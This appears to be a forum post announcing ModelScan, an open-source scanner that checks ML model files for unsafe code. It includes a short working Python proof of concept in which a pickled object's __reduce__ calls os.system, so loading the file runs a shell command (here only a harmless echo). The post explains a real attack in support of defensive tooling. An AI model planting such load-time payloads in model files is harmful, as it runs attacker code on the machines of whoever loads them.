ModelScan – open-source scanning for unsafe code in ML models (github.com/protectai)
4 points by wolftickets 10 months ago | 1 comment



I lead product at Protect AI, and we just released ModelScan. It is an open source project that scans models to determine whether they contain unsafe code, and it is the first model scanning tool to support multiple model formats. ModelScan currently supports the H5, Pickle, and SavedModel formats, which protects you when loading models from PyTorch, TensorFlow, Keras, scikit-learn, and XGBoost, with more formats on the way.
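For context on what "unsafe code" means here: the Pickle format (used for PyTorch and scikit-learn checkpoints, among others) lets a serialized object run an arbitrary callable at load time via __reduce__, and that is the class of payload a scanner like this looks for. A minimal, self-contained illustration of the attack (the file name model.pkl and the echoed string are placeholders):

    import os
    import pickle


    class MaliciousPayload:
        """Unpickling calls the callable returned by __reduce__ with the
        given arguments, so merely loading the file runs attacker code."""

        def __reduce__(self):
            # On load, pickle invokes os.system with this command, which
            # runs with whatever privileges the loading process has.
            return (os.system, ('echo "arbitrary code ran on model load"',))


    # "Publish" a model file carrying the payload.
    with open("model.pkl", "wb") as f:
        pickle.dump(MaliciousPayload(), f)

    # Simply loading the model triggers the embedded command.
    with open("model.pkl", "rb") as f:
        pickle.load(f)

Scanning a file like this before loading it is the point of the tool; if I recall the README correctly the CLI is invoked along the lines of modelscan -p ./model.pkl, but check the repository for the exact current flags.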



